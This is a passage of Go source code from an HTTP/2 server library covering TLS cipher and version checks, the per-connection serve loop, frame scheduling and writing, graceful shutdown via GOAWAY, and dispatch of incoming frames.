return fmt.Errorf("http2: TLSConfig.CipherSuites index %d contains an HTTP/2-approved cipher suite (%#04x), but it comes after unapproved cipher suites. With this configuration, clients that don't support previous, approved cipher suites may be given an unapproved one and reject the connection.", i, cs)
}
}
if !haveRequired {
return fmt.Errorf("http2: TLSConfig.CipherSuites is missing HTTP/2-required TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256")
}
}
// Note: not setting MinVersion to tls.VersionTLS12,
// as we don't want to interfere with HTTP/1.1 traffic
// on the user's server. We enforce TLS 1.2 later once
// we accept a connection. Ideally this should be done
// during next-proto selection, but using TLS <1.2 with
// HTTP/2 is still the client's bug.
s.TLSConfig.PreferServerCipherSuites = true
haveNPN := false
for _, p := range s.TLSConfig.NextProtos {
if p == NextProtoTLS {
haveNPN = true
break
}
}
if !haveNPN {
s.TLSConfig.NextProtos = append(s.TLSConfig.NextProtos, NextProtoTLS)
}
if s.TLSNextProto == nil {
s.TLSNextProto = map[string]func(*http.Server, *tls.Conn, http.Handler){}
}
protoHandler := func(hs *http.Server, c *tls.Conn, h http.Handler) {
if testHookOnConn != nil {
testHookOnConn()
}
conf.ServeConn(c, &ServeConnOpts{
Handler: h,
BaseConfig: hs,
})
}
s.TLSNextProto[NextProtoTLS] = protoHandler
return nil
}
// ServeConnOpts are options for the Server.ServeConn method.
type ServeConnOpts struct {
// BaseConfig optionally sets the base configuration
// for values. If nil, defaults are used.
BaseConfig *http.Server
// Handler specifies which handler to use for processing
// requests. If nil, BaseConfig.Handler is used. If BaseConfig
// or BaseConfig.Handler is nil, http.DefaultServeMux is used.
Handler http.Handler
}
func (o *ServeConnOpts) baseConfig() *http.Server {
if o != nil && o.BaseConfig != nil {
return o.BaseConfig
}
return new(http.Server)
}
func (o *ServeConnOpts) handler() http.Handler {
if o != nil {
if o.Handler != nil {
return o.Handler
}
if o.BaseConfig != nil && o.BaseConfig.Handler != nil {
return o.BaseConfig.Handler
}
}
return http.DefaultServeMux
}
// ServeConn serves HTTP/2 requests on the provided connection and
// blocks until the connection is no longer readable.
//
// ServeConn starts speaking HTTP/2 assuming that c has not had any
// reads or writes. It writes its initial settings frame and expects
// to be able to read the preface and settings frame from the
// client. If c has a ConnectionState method like a *tls.Conn, the
// ConnectionState is used to verify the TLS ciphersuite and to set
// the Request.TLS field in Handlers.
//
// ServeConn does not support h2c by itself. Any h2c support must be
// implemented in terms of providing a suitably-behaving net.Conn.
//
// The opts parameter is optional. If nil, default values are used.
func (s *Server) ServeConn(c net.Conn, opts *ServeConnOpts) {
baseCtx, cancel := serverConnBaseContext(c, opts)
defer cancel()
sc := &serverConn{
srv: s,
hs: opts.baseConfig(),
conn: c,
baseCtx: baseCtx,
remoteAddrStr: c.RemoteAddr().String(),
bw: newBufferedWriter(c),
handler: opts.handler(),
streams: make(map[uint32]*stream),
readFrameCh: make(chan readFrameResult),
wantWriteFrameCh: make(chan FrameWriteRequest, 8),
serveMsgCh: make(chan interface{}, 8),
wroteFrameCh: make(chan frameWriteResult, 1), // buffered; one send in writeFrameAsync
bodyReadCh: make(chan bodyReadMsg), // buffering doesn't matter either way
doneServing: make(chan struct{}),
clientMaxStreams: math.MaxUint32, // Section 6.5.2: "Initially, there is no limit to this value"
advMaxStreams: s.maxConcurrentStreams(),
initialStreamSendWindowSize: initialWindowSize,
maxFrameSize: initialMaxFrameSize,
headerTableSize: initialHeaderTableSize,
serveG: newGoroutineLock(),
pushEnabled: true,
}
s.state.registerConn(sc)
defer s.state.unregisterConn(sc)
// The net/http package sets the write deadline from the
// http.Server.WriteTimeout during the TLS handshake, but then
// passes the connection off to us with the deadline already set.
// Write deadlines are set per stream in serverConn.newStream.
// Disarm the net.Conn write deadline here.
if sc.hs.WriteTimeout != 0 {
sc.conn.SetWriteDeadline(time.Time{})
}
if s.NewWriteScheduler != nil {
sc.writeSched = s.NewWriteScheduler()
} else {
sc.writeSched = NewRandomWriteScheduler()
}
// These start at the RFC-specified defaults. If there is a higher
// configured value for inflow, that will be updated when we send a
// WINDOW_UPDATE shortly after sending SETTINGS.
sc.flow.add(initialWindowSize)
sc.inflow.add(initialWindowSize)
sc.hpackEncoder = hpack.NewEncoder(&sc.headerWriteBuf)
fr := NewFramer(sc.bw, c)
fr.ReadMetaHeaders = hpack.NewDecoder(initialHeaderTableSize, nil)
fr.MaxHeaderListSize = sc.maxHeaderListSize()
fr.SetMaxReadFrameSize(s.maxReadFrameSize())
sc.framer = fr
if tc, ok := c.(connectionStater); ok {
sc.tlsState = new(tls.ConnectionState)
*sc.tlsState = tc.ConnectionState()
// 9.2 Use of TLS Features
// An implementation of HTTP/2 over TLS MUST use TLS
// 1.2 or higher with the restrictions on feature set
// and cipher suite described in this section. Due to
// implementation limitations, it might not be
// possible to fail TLS negotiation. An endpoint MUST
// immediately terminate an HTTP/2 connection that
// does not meet the TLS requirements described in
// this section with a connection error (Section
// 5.4.1) of type INADEQUATE_SECURITY.
if sc.tlsState.Version < tls.VersionTLS12 {
sc.rejectConn(ErrCodeInadequateSecurity, "TLS version too low")
return
}
if sc.tlsState.ServerName == "" {
// Client must use SNI, but we don't enforce that anymore,
// since it was causing problems when connecting to bare IP
// addresses during development.
//
// TODO: optionally enforce? Or enforce at the time we receive
// a new request, and verify the the ServerName matches the :authority?
// But that precludes proxy situations, perhaps.
//
// So for now, do nothing here again.
}
if !s.PermitProhibitedCipherSuites && isBadCipher(sc.tlsState.CipherSuite) {
// "Endpoints MAY choose to generate a connection error
// (Section 5.4.1) of type INADEQUATE_SECURITY if one of
// the prohibited cipher suites are negotiated."
//
// We choose that. In my opinion, the spec is weak
// here. It also says both parties must support at least
// TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 so there's no
// excuses here. If we really must, we could allow an
// "AllowInsecureWeakCiphers" option on the server later.
// Let's see how it plays out first.
sc.rejectConn(ErrCodeInadequateSecurity, fmt.Sprintf("Prohibited TLS 1.2 Cipher Suite: %x", sc.tlsState.CipherSuite))
return
}
}
if hook := testHookGetServerConn; hook != nil {
hook(sc)
}
sc.serve()
}
func (sc *serverConn) rejectConn(err ErrCode, debug string) {
sc.vlogf("http2: server rejecting conn: %v, %s", err, debug)
// ignoring errors. hanging up anyway.
sc.framer.WriteGoAway(0, err, []byte(debug))
sc.bw.Flush()
sc.conn.Close()
}
type serverConn struct {
// Immutable:
srv *Server
hs *http.Server
conn net.Conn
bw *bufferedWriter // writing to conn
handler http.Handler
baseCtx contextContext
framer *Framer
doneServing chan struct{} // closed when serverConn.serve ends
readFrameCh chan readFrameResult // written by serverConn.readFrames
wantWriteFrameCh chan FrameWriteRequest // from handlers -> serve
wroteFrameCh chan frameWriteResult // from writeFrameAsync -> serve, tickles more frame writes
bodyReadCh chan bodyReadMsg // from handlers -> serve
serveMsgCh chan interface{} // misc messages & code to send to / run on the serve loop
flow flow // conn-wide (not stream-specific) outbound flow control
inflow flow // conn-wide inbound flow control
tlsState *tls.ConnectionState // shared by all handlers, like net/http
remoteAddrStr string
writeSched WriteScheduler
// Everything following is owned by the serve loop; use serveG.check():
serveG goroutineLock // used to verify funcs are on serve()
pushEnabled bool
sawFirstSettings bool // got the initial SETTINGS frame after the preface
needToSendSettingsAck bool
unackedSettings int // how many SETTINGS have we sent without ACKs?
clientMaxStreams uint32 // SETTINGS_MAX_CONCURRENT_STREAMS from client (our PUSH_PROMISE limit)
advMaxStreams uint32 // our SETTINGS_MAX_CONCURRENT_STREAMS advertised the client
curClientStreams uint32 // number of open streams initiated by the client
curPushedStreams uint32 // number of open streams initiated by server push
maxClientStreamID uint32 // max ever seen from client (odd), or 0 if there have been no client requests
maxPushPromiseID uint32 // ID of the last push promise (even), or 0 if there have been no pushes
streams map[uint32]*stream
initialStreamSendWindowSize int32
maxFrameSize int32
headerTableSize uint32
peerMaxHeaderListSize uint32 // zero means unknown (default)
canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
writingFrame bool // started writing a frame (on serve goroutine or separate)
writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
needsFrameFlush bool // last frame write wasn't a flush
inGoAway bool // we've started to or sent GOAWAY
inFrameScheduleLoop bool // whether we're in the scheduleFrameWrite loop
needToSendGoAway bool // we need to schedule a GOAWAY frame write
goAwayCode ErrCode
shutdownTimer *time.Timer // nil until used
idleTimer *time.Timer // nil if unused
// Owned by the writeFrameAsync goroutine:
headerWriteBuf bytes.Buffer
hpackEncoder *hpack.Encoder
// Used by startGracefulShutdown.
shutdownOnce sync.Once
}
func (sc *serverConn) maxHeaderListSize() uint32 {
n := sc.hs.MaxHeaderBytes
if n <= 0 {
n = http.DefaultMaxHeaderBytes
}
// http2's count is in a slightly different unit and includes 32 bytes per pair.
// So, take the net/http.Server value and pad it up a bit, assuming 10 headers.
const perFieldOverhead = 32 // per http2 spec
const typicalHeaders = 10 // conservative
return uint32(n + typicalHeaders*perFieldOverhead)
}
func (sc *serverConn) curOpenStreams() uint32 {
sc.serveG.check()
return sc.curClientStreams + sc.curPushedStreams
}
// stream represents a stream. This is the minimal metadata needed by
// the serve goroutine. Most of the actual stream state is owned by
// the http.Handler's goroutine in the responseWriter. Because the
// responseWriter's responseWriterState is recycled at the end of a
// handler, this struct intentionally has no pointer to the
// *responseWriter{,State} itself, as the Handler ending nils out the
// responseWriter's state field.
type stream struct {
// immutable:
sc *serverConn
id uint32
body *pipe // non-nil if expecting DATA frames
cw closeWaiter // closed wait stream transitions to closed state
ctx contextContext
cancelCtx func()
// owned by serverConn's serve loop:
bodyBytes int64 // body bytes seen so far
declBodyBytes int64 // or -1 if undeclared
flow flow // limits writing from Handler to client
inflow flow // what the client is allowed to POST/etc to us
parent *stream // or nil
numTrailerValues int64
weight uint8
state streamState
resetQueued bool // RST_STREAM queued for write; set by sc.resetStream
gotTrailerHeader bool // HEADER frame for trailers was seen
wroteHeaders bool // whether we wrote headers (not status 100)
writeDeadline *time.Timer // nil if unused
trailer http.Header // accumulated trailers
reqTrailer http.Header // handler's Request.Trailer
}
func (sc *serverConn) Framer() *Framer { return sc.framer }
func (sc *serverConn) CloseConn() error { return sc.conn.Close() }
func (sc *serverConn) Flush() error { return sc.bw.Flush() }
func (sc *serverConn) HeaderEncoder() (*hpack.Encoder, *bytes.Buffer) {
return sc.hpackEncoder, &sc.headerWriteBuf
}
func (sc *serverConn) state(streamID uint32) (streamState, *stream) {
sc.serveG.check()
// http://tools.ietf.org/html/rfc7540#section-5.1
if st, ok := sc.streams[streamID]; ok {
return st.state, st
}
// "The first use of a new stream identifier implicitly closes all
// streams in the "idle" state that might have been initiated by
// that peer with a lower-valued stream identifier. For example, if
// a client sends a HEADERS frame on stream 7 without ever sending a
// frame on stream 5, then stream 5 transitions to the "closed"
// state when the first frame for stream 7 is sent or received."
if streamID%2 == 1 {
if streamID <= sc.maxClientStreamID {
return stateClosed, nil
}
} else {
if streamID <= sc.maxPushPromiseID {
return stateClosed, nil
}
}
return stateIdle, nil
}
// setConnState calls the net/http ConnState hook for this connection, if configured.
// Note that the net/http package does StateNew and StateClosed for us.
// There is currently no plan for StateHijacked or hijacking HTTP/2 connections.
func (sc *serverConn) setConnState(state http.ConnState) {
if sc.hs.ConnState != nil {
sc.hs.ConnState(sc.conn, state)
}
}
func (sc *serverConn) vlogf(format string, args ...interface{}) {
if VerboseLogs {
sc.logf(format, args...)
}
}
func (sc *serverConn) logf(format string, args ...interface{}) {
if lg := sc.hs.ErrorLog; lg != nil {
lg.Printf(format, args...)
} else {
log.Printf(format, args...)
}
}
// errno returns v's underlying uintptr, else 0.
//
// TODO: remove this helper function once http2 can use build
// tags. See comment in isClosedConnError.
func errno(v error) uintptr {
if rv := reflect.ValueOf(v); rv.Kind() == reflect.Uintptr {
return uintptr(rv.Uint())
}
return 0
}
// isClosedConnError reports whether err is an error from use of a closed
// network connection.
func isClosedConnError(err error) bool {
if err == nil {
return false
}
// TODO: remove this string search and be more like the Windows
// case below. That might involve modifying the standard library
// to return better error types.
str := err.Error()
if strings.Contains(str, "use of closed network connection") {
return true
}
// TODO(bradfitz): x/tools/cmd/bundle doesn't really support
// build tags, so I can't make an http2_windows.go file with
// Windows-specific stuff. Fix that and move this, once we
// have a way to bundle this into std's net/http somehow.
if runtime.GOOS == "windows" {
if oe, ok := err.(*net.OpError); ok && oe.Op == "read" {
if se, ok := oe.Err.(*os.SyscallError); ok && se.Syscall == "wsarecv" {
const WSAECONNABORTED = 10053
const WSAECONNRESET = 10054
if n := errno(se.Err); n == WSAECONNRESET || n == WSAECONNABORTED {
return true
}
}
}
}
return false
}
func (sc *serverConn) condlogf(err error, format string, args ...interface{}) {
if err == nil {
return
}
if err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err) {
// Boring, expected errors.
sc.vlogf(format, args...)
} else {
sc.logf(format, args...)
}
}
func (sc *serverConn) canonicalHeader(v string) string {
sc.serveG.check()
cv, ok := commonCanonHeader[v]
if ok {
return cv
}
cv, ok = sc.canonHeader[v]
if ok {
return cv
}
if sc.canonHeader == nil {
sc.canonHeader = make(map[string]string)
}
cv = http.CanonicalHeaderKey(v)
sc.canonHeader[v] = cv
return cv
}
type readFrameResult struct {
f Frame // valid until readMore is called
err error
// readMore should be called once the consumer no longer needs or
// retains f. After readMore, f is invalid and more frames can be
// read.
readMore func()
}
// readFrames is the loop that reads incoming frames.
// It takes care to only read one frame at a time, blocking until the
// consumer is done with the frame.
// It's run on its own goroutine.
func (sc *serverConn) readFrames() {
gate := make(gate)
gateDone := gate.Done
for {
f, err := sc.framer.ReadFrame()
select {
case sc.readFrameCh <- readFrameResult{f, err, gateDone}:
case <-sc.doneServing:
return
}
select {
case <-gate:
case <-sc.doneServing:
return
}
if terminalReadFrameError(err) {
return
}
}
}
// frameWriteResult is the message passed from writeFrameAsync to the serve goroutine.
type frameWriteResult struct {
wr FrameWriteRequest // what was written (or attempted)
err error // result of the writeFrame call
}
// writeFrameAsync runs in its own goroutine and writes a single frame
// and then reports when it's done.
// At most one goroutine can be running writeFrameAsync at a time per
// serverConn.
func (sc *serverConn) writeFrameAsync(wr FrameWriteRequest) {
err := wr.write.writeFrame(sc)
sc.wroteFrameCh <- frameWriteResult{wr, err}
}
func (sc *serverConn) closeAllStreamsOnConnClose() {
sc.serveG.check()
for _, st := range sc.streams {
sc.closeStream(st, errClientDisconnected)
}
}
func (sc *serverConn) stopShutdownTimer() {
sc.serveG.check()
if t := sc.shutdownTimer; t != nil {
t.Stop()
}
}
func (sc *serverConn) notePanic() {
// Note: this is for serverConn.serve panicking, not http.Handler code.
if testHookOnPanicMu != nil {
testHookOnPanicMu.Lock()
defer testHookOnPanicMu.Unlock()
}
if testHookOnPanic != nil {
if e := recover(); e != nil {
if testHookOnPanic(sc, e) {
panic(e)
}
}
}
}
func (sc *serverConn) serve() {
sc.serveG.check()
defer sc.notePanic()
defer sc.conn.Close()
defer sc.closeAllStreamsOnConnClose()
defer sc.stopShutdownTimer()
defer close(sc.doneServing) // unblocks handlers trying to send
if VerboseLogs {
sc.vlogf("http2: server connection from %v on %p", sc.conn.RemoteAddr(), sc.hs)
}
sc.writeFrame(FrameWriteRequest{
write: writeSettings{
{SettingMaxFrameSize, sc.srv.maxReadFrameSize()},
{SettingMaxConcurrentStreams, sc.advMaxStreams},
{SettingMaxHeaderListSize, sc.maxHeaderListSize()},
{SettingInitialWindowSize, uint32(sc.srv.initialStreamRecvWindowSize())},
},
})
sc.unackedSettings++
// Each connection starts with intialWindowSize inflow tokens.
// If a higher value is configured, we add more tokens.
if diff := sc.srv.initialConnRecvWindowSize() - initialWindowSize; diff > 0 {
sc.sendWindowUpdate(nil, int(diff))
}
if err := sc.readPreface(); err != nil {
sc.condlogf(err, "http2: server: error reading preface from client %v: %v", sc.conn.RemoteAddr(), err)
return
}
// Now that we've got the preface, get us out of the
// "StateNew" state. We can't go directly to idle, though.
// Active means we read some data and anticipate a request. We'll
// do another Active when we get a HEADERS frame.
sc.setConnState(http.StateActive)
sc.setConnState(http.StateIdle)
if sc.srv.IdleTimeout != 0 {
sc.idleTimer = time.AfterFunc(sc.srv.IdleTimeout, sc.onIdleTimer)
defer sc.idleTimer.Stop()
}
go sc.readFrames() // closed by defer sc.conn.Close above
settingsTimer := time.AfterFunc(firstSettingsTimeout, sc.onSettingsTimer)
defer settingsTimer.Stop()
loopNum := 0
for {
loopNum++
select {
case wr := <-sc.wantWriteFrameCh:
if se, ok := wr.write.(StreamError); ok {
sc.resetStream(se)
break
}
sc.writeFrame(wr)
case res := <-sc.wroteFrameCh:
sc.wroteFrame(res)
case res := <-sc.readFrameCh:
if !sc.processFrameFromReader(res) {
return
}
res.readMore()
if settingsTimer != nil {
settingsTimer.Stop()
settingsTimer = nil
}
case m := <-sc.bodyReadCh:
sc.noteBodyRead(m.st, m.n)
case msg := <-sc.serveMsgCh:
switch v := msg.(type) {
case func(int):
v(loopNum) // for testing
case *serverMessage:
switch v {
case settingsTimerMsg:
sc.logf("timeout waiting for SETTINGS frames from %v", sc.conn.RemoteAddr())
return
case idleTimerMsg:
sc.vlogf("connection is idle")
sc.goAway(ErrCodeNo)
case shutdownTimerMsg:
sc.vlogf("GOAWAY close timer fired; closing conn from %v", sc.conn.RemoteAddr())
return
case gracefulShutdownMsg:
sc.startGracefulShutdownInternal()
default:
panic("unknown timer")
}
case *startPushRequest:
sc.startPush(v)
default:
panic(fmt.Sprintf("unexpected type %T", v))
}
}
if sc.inGoAway && sc.curOpenStreams() == 0 && !sc.needToSendGoAway && !sc.writingFrame {
return
}
}
}
func (sc *serverConn) awaitGracefulShutdown(sharedCh <-chan struct{}, privateCh chan struct{}) {
select {
case <-sc.doneServing:
case <-sharedCh:
close(privateCh)
}
}
type serverMessage int
// Message values sent to serveMsgCh.
var (
settingsTimerMsg = new(serverMessage)
idleTimerMsg = new(serverMessage)
shutdownTimerMsg = new(serverMessage)
gracefulShutdownMsg = new(serverMessage)
)
func (sc *serverConn) onSettingsTimer() { sc.sendServeMsg(settingsTimerMsg) }
func (sc *serverConn) onIdleTimer() { sc.sendServeMsg(idleTimerMsg) }
func (sc *serverConn) onShutdownTimer() { sc.sendServeMsg(shutdownTimerMsg) }
func (sc *serverConn) sendServeMsg(msg interface{}) {
sc.serveG.checkNotOn() // NOT
select {
case sc.serveMsgCh <- msg:
case <-sc.doneServing:
}
}
// readPreface reads the ClientPreface greeting from the peer
// or returns an error on timeout or an invalid greeting.
func (sc *serverConn) readPreface() error {
errc := make(chan error, 1)
go func() {
// Read the client preface
buf := make([]byte, len(ClientPreface))
if _, err := io.ReadFull(sc.conn, buf); err != nil {
errc <- err
} else if !bytes.Equal(buf, clientPreface) {
errc <- fmt.Errorf("bogus greeting %q", buf)
} else {
errc <- nil
}
}()
timer := time.NewTimer(prefaceTimeout) // TODO: configurable on *Server?
defer timer.Stop()
select {
case <-timer.C:
return errors.New("timeout waiting for client preface")
case err := <-errc:
if err == nil {
if VerboseLogs {
sc.vlogf("http2: server: client %v said hello", sc.conn.RemoteAddr())
}
}
return err
}
}
var errChanPool = sync.Pool{
New: func() interface{} { return make(chan error, 1) },
}
var writeDataPool = sync.Pool{
New: func() interface{} { return new(writeData) },
}
// writeDataFromHandler writes DATA response frames from a handler on
// the given stream.
func (sc *serverConn) writeDataFromHandler(stream *stream, data []byte, endStream bool) error {
ch := errChanPool.Get().(chan error)
writeArg := writeDataPool.Get().(*writeData)
*writeArg = writeData{stream.id, data, endStream}
err := sc.writeFrameFromHandler(FrameWriteRequest{
write: writeArg,
stream: stream,
done: ch,
})
if err != nil {
return err
}
var frameWriteDone bool // the frame write is done (successfully or not)
select {
case err = <-ch:
frameWriteDone = true
case <-sc.doneServing:
return errClientDisconnected
case <-stream.cw:
// If both ch and stream.cw were ready (as might
// happen on the final Write after an http.Handler
// ends), prefer the write result. Otherwise this
// might just be us successfully closing the stream.
// The writeFrameAsync and serve goroutines guarantee
// that the ch send will happen before the stream.cw
// close.
select {
case err = <-ch:
frameWriteDone = true
default:
return errStreamClosed
}
}
errChanPool.Put(ch)
if frameWriteDone {
writeDataPool.Put(writeArg)
}
return err
}
// writeFrameFromHandler sends wr to sc.wantWriteFrameCh, but aborts
// if the connection has gone away.
//
// This must not be run from the serve goroutine itself, else it might
// deadlock writing to sc.wantWriteFrameCh (which is only mildly
// buffered and is read by serve itself). If you're on the serve
// goroutine, call writeFrame instead.
func (sc *serverConn) writeFrameFromHandler(wr FrameWriteRequest) error {
sc.serveG.checkNotOn() // NOT
select {
case sc.wantWriteFrameCh <- wr:
return nil
case <-sc.doneServing:
// Serve loop is gone.
// Client has closed their connection to the server.
return errClientDisconnected
}
}
// writeFrame schedules a frame to write and sends it if there's nothing
// already being written.
//
// There is no pushback here (the serve goroutine never blocks). It's
// the http.Handlers that block, waiting for their previous frames to
// make it onto the wire
//
// If you're not on the serve goroutine, use writeFrameFromHandler instead.
func (sc *serverConn) writeFrame(wr FrameWriteRequest) {
sc.serveG.check()
// If true, wr will not be written and wr.done will not be signaled.
var ignoreWrite bool
// We are not allowed to write frames on closed streams. RFC 7540 Section
// 5.1.1 says: "An endpoint MUST NOT send frames other than PRIORITY on
// a closed stream." Our server never sends PRIORITY, so that exception
// does not apply.
//
// The serverConn might close an open stream while the stream's handler
// is still running. For example, the server might close a stream when it
// receives bad data from the client. If this happens, the handler might
// attempt to write a frame after the stream has been closed (since the
// handler hasn't yet been notified of the close). In this case, we simply
// ignore the frame. The handler will notice that the stream is closed when
// it waits for the frame to be written.
//
// As an exception to this rule, we allow sending RST_STREAM after close.
// This allows us to immediately reject new streams without tracking any
// state for those streams (except for the queued RST_STREAM frame). This
// may result in duplicate RST_STREAMs in some cases, but the client should
// ignore those.
if wr.StreamID() != 0 {
_, isReset := wr.write.(StreamError)
if state, _ := sc.state(wr.StreamID()); state == stateClosed && !isReset {
ignoreWrite = true
}
}
// Don't send a 100-continue response if we've already sent headers.
// See golang.org/issue/14030.
switch wr.write.(type) {
case *writeResHeaders:
wr.stream.wroteHeaders = true
case write100ContinueHeadersFrame:
if wr.stream.wroteHeaders {
// We do not need to notify wr.done because this frame is
// never written with wr.done != nil.
if wr.done != nil {
panic("wr.done != nil for write100ContinueHeadersFrame")
}
ignoreWrite = true
}
}
if !ignoreWrite {
sc.writeSched.Push(wr)
}
sc.scheduleFrameWrite()
}
// startFrameWrite starts a goroutine to write wr (in a separate
// goroutine since that might block on the network), and updates the
// serve goroutine's state about the world, updated from info in wr.
func (sc *serverConn) startFrameWrite(wr FrameWriteRequest) {
sc.serveG.check()
if sc.writingFrame {
panic("internal error: can only be writing one frame at a time")
}
st := wr.stream
if st != nil {
switch st.state {
case stateHalfClosedLocal:
switch wr.write.(type) {
case StreamError, handlerPanicRST, writeWindowUpdate:
// RFC 7540 Section 5.1 allows sending RST_STREAM, PRIORITY, and WINDOW_UPDATE
// in this state. (We never send PRIORITY from the server, so that is not checked.)
default:
panic(fmt.Sprintf("internal error: attempt to send frame on a half-closed-local stream: %v", wr))
}
case stateClosed:
panic(fmt.Sprintf("internal error: attempt to send frame on a closed stream: %v", wr))
}
}
if wpp, ok := wr.write.(*writePushPromise); ok {
var err error
wpp.promisedID, err = wpp.allocatePromisedID()
if err != nil {
sc.writingFrameAsync = false
wr.replyToWriter(err)
return
}
}
sc.writingFrame = true
sc.needsFrameFlush = true
if wr.write.staysWithinBuffer(sc.bw.Available()) {
sc.writingFrameAsync = false
err := wr.write.writeFrame(sc)
sc.wroteFrame(frameWriteResult{wr, err})
} else {
sc.writingFrameAsync = true
go sc.writeFrameAsync(wr)
}
}
// errHandlerPanicked is the error given to any callers blocked in a read from
// Request.Body when the main goroutine panics. Since most handlers read in the
// the main ServeHTTP goroutine, this will show up rarely.
var errHandlerPanicked = errors.New("http2: handler panicked")
// wroteFrame is called on the serve goroutine with the result of
// whatever happened on writeFrameAsync.
func (sc *serverConn) wroteFrame(res frameWriteResult) {
sc.serveG.check()
if !sc.writingFrame {
panic("internal error: expected to be already writing a frame")
}
sc.writingFrame = false
sc.writingFrameAsync = false
wr := res.wr
if writeEndsStream(wr.write) {
st := wr.stream
if st == nil {
panic("internal error: expecting non-nil stream")
}
switch st.state {
case stateOpen:
// Here we would go to stateHalfClosedLocal in
// theory, but since our handler is done and
// the net/http package provides no mechanism
// for closing a ResponseWriter while still
// reading data (see possible TODO at top of
// this file), we go into closed state here
// anyway, after telling the peer we're
// hanging up on them. We'll transition to
// stateClosed after the RST_STREAM frame is
// written.
st.state = stateHalfClosedLocal
// Section 8.1: a server MAY request that the client abort
// transmission of a request without error by sending a
// RST_STREAM with an error code of NO_ERROR after sending
// a complete response.
sc.resetStream(streamError(st.id, ErrCodeNo))
case stateHalfClosedRemote:
sc.closeStream(st, errHandlerComplete)
}
} else {
switch v := wr.write.(type) {
case StreamError:
// st may be unknown if the RST_STREAM was generated to reject bad input.
if st, ok := sc.streams[v.StreamID]; ok {
sc.closeStream(st, v)
}
case handlerPanicRST:
sc.closeStream(wr.stream, errHandlerPanicked)
}
}
// Reply (if requested) to unblock the ServeHTTP goroutine.
wr.replyToWriter(res.err)
sc.scheduleFrameWrite()
}
// scheduleFrameWrite tickles the frame writing scheduler.
//
// If a frame is already being written, nothing happens. This will be called again
// when the frame is done being written.
//
// If a frame isn't being written we need to send one, the best frame
// to send is selected, preferring first things that aren't
// stream-specific (e.g. ACKing settings), and then finding the
// highest priority stream.
//
// If a frame isn't being written and there's nothing else to send, we
// flush the write buffer.
func (sc *serverConn) scheduleFrameWrite() {
sc.serveG.check()
if sc.writingFrame || sc.inFrameScheduleLoop {
return
}
sc.inFrameScheduleLoop = true
for !sc.writingFrameAsync {
if sc.needToSendGoAway {
sc.needToSendGoAway = false
sc.startFrameWrite(FrameWriteRequest{
write: &writeGoAway{
maxStreamID: sc.maxClientStreamID,
code: sc.goAwayCode,
},
})
continue
}
if sc.needToSendSettingsAck {
sc.needToSendSettingsAck = false
sc.startFrameWrite(FrameWriteRequest{write: writeSettingsAck{}})
continue
}
if !sc.inGoAway || sc.goAwayCode == ErrCodeNo {
if wr, ok := sc.writeSched.Pop(); ok {
sc.startFrameWrite(wr)
continue
}
}
if sc.needsFrameFlush {
sc.startFrameWrite(FrameWriteRequest{write: flushFrameWriter{}})
sc.needsFrameFlush = false // after startFrameWrite, since it sets this true
continue
}
break
}
sc.inFrameScheduleLoop = false
}
// startGracefulShutdown gracefully shuts down a connection. This
// sends GOAWAY with ErrCodeNo to tell the client we're gracefully
// shutting down. The connection isn't closed until all current
// streams are done.
//
// startGracefulShutdown returns immediately; it does not wait until
// the connection has shut down.
func (sc *serverConn) startGracefulShutdown() {
sc.serveG.checkNotOn() // NOT
sc.shutdownOnce.Do(func() { sc.sendServeMsg(gracefulShutdownMsg) })
}
func (sc *serverConn) startGracefulShutdownInternal() {
sc.goAwayIn(ErrCodeNo, 0)
}
func (sc *serverConn) goAway(code ErrCode) {
sc.serveG.check()
var forceCloseIn time.Duration
if code != ErrCodeNo {
forceCloseIn = 250 * time.Millisecond
} else {
// TODO: configurable
forceCloseIn = 1 * time.Second
}
sc.goAwayIn(code, forceCloseIn)
}
func (sc *serverConn) goAwayIn(code ErrCode, forceCloseIn time.Duration) {
sc.serveG.check()
if sc.inGoAway {
return
}
if forceCloseIn != 0 {
sc.shutDownIn(forceCloseIn)
}
sc.inGoAway = true
sc.needToSendGoAway = true
sc.goAwayCode = code
sc.scheduleFrameWrite()
}
func (sc *serverConn) shutDownIn(d time.Duration) {
sc.serveG.check()
sc.shutdownTimer = time.AfterFunc(d, sc.onShutdownTimer)
}
func (sc *serverConn) resetStream(se StreamError) {
sc.serveG.check()
sc.writeFrame(FrameWriteRequest{write: se})
if st, ok := sc.streams[se.StreamID]; ok {
st.resetQueued = true
}
}
// processFrameFromReader processes the serve loop's read from readFrameCh from the
// frame-reading goroutine.
// processFrameFromReader returns whether the connection should be kept open.
func (sc *serverConn) processFrameFromReader(res readFrameResult) bool {
sc.serveG.check()
err := res.err
if err != nil {
if err == ErrFrameTooLarge {
sc.goAway(ErrCodeFrameSize)
return true // goAway will close the loop
}
clientGone := err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err)
if clientGone {
// TODO: could we also get into this state if
// the peer does a half close
// (e.g. CloseWrite) because they're done
// sending frames but they're still wanting
// our open replies? Investigate.
// TODO: add CloseWrite to crypto/tls.Conn first
// so we have a way to test this? I suppose
// just for testing we could have a non-TLS mode.
return false
}
} else {
f := res.f
if VerboseLogs {
sc.vlogf("http2: server read frame %v", summarizeFrame(f))
}
err = sc.processFrame(f)
if err == nil {
return true
}
}
switch ev := err.(type) {
case StreamError:
sc.resetStream(ev)
return true
case goAwayFlowError:
sc.goAway(ErrCodeFlowControl)
return true
case ConnectionError:
sc.logf("http2: server connection error from %v: %v", sc.conn.RemoteAddr(), ev)
sc.goAway(ErrCode(ev))
return true // goAway will handle shutdown
default:
if res.err != nil {
sc.vlogf("http2: server closing client connection; error reading frame from client %s: %v", sc.conn.RemoteAddr(), err)
} else {
sc.logf("http2: server closing client connection: %v", err)
}
return false
}
}
func (sc *serverConn) processFrame(f Frame) error {
sc.serveG.check()
// First frame received must be SETTINGS.
if !sc.sawFirstSettings {
if _, ok := f.(*SettingsFrame); !ok {
return ConnectionError(ErrCodeProtocol)
}
sc.sawFirstSettings = true
}
switch f := f.(type) {
case *SettingsFrame:
return sc.processSettings(f)
case *MetaHeadersFrame:
return sc.processHeaders(f)
case *WindowUpdateFrame:
return sc.processWindowUpdate(f)
case *PingFrame:
return sc.processPing(f)
case *DataFrame:
return sc.processData(f)
case *RSTStreamFrame:
return sc.processResetStream(f)
case *PriorityFrame:
return sc.processPriority(f)
case *GoAwayFrame:
return sc.processGoAway(f)
case *PushPromiseFrame:
